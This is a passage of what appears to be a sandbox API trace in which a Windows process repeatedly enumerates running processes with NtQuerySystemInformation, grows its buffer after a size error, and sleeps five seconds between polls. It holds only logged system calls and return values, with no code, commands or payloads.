BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.042] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.058] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.073] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.086] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.086] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.089] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.123] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.137] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.152] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.166] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.184] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.198] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.218] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.231] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.245] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.260] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.276] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.293] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.307] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.322] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.339] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.367] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.385] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 